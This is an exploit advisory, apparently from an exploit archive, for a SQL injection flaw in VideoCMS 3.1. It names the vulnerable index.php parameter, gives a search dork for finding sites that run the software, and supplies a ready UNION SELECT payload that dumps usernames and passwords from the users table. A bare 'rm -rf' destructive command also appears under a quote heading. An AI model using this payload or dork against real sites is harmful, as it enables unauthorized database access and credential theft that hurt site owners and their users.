id: 10352
date: 12/21/2009
title: VideoCMS SQL Injection Vulnerability
author: kaMtiEz
cves: 

====================================
VideoCMS SQL Injection Vulnerability
====================================

###################################################################################
 
[ Software Information ]
 
[+] Vendor : http://www.codemight.com/
[+] version : 3.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Location : INDONESIA - JOGJA
 
##################################################################################
 
 
[ HERE WE GO .. LIVE FROM JOGJA CITY ]
 
[ Vulnerable File ]
 
http://server/[kaMtiEz]/index.php?m=video&v=[VALID-ID][SQL]
 
[ Exploit ]
 
/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--
 
 
===========================================================================
 [ QUOTE ]
 
[+] rm -rf 



#  0day.today [2023-03-22]  #